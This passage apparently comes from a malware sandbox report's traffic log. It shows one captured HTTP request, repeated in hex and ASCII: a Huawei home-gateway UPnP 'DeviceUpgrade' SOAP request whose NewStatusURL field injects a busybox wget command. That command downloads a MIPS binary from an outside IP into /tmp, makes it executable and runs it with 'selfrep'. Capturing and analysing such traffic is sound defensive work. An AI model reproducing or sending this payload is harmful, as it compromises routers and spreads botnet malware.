70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 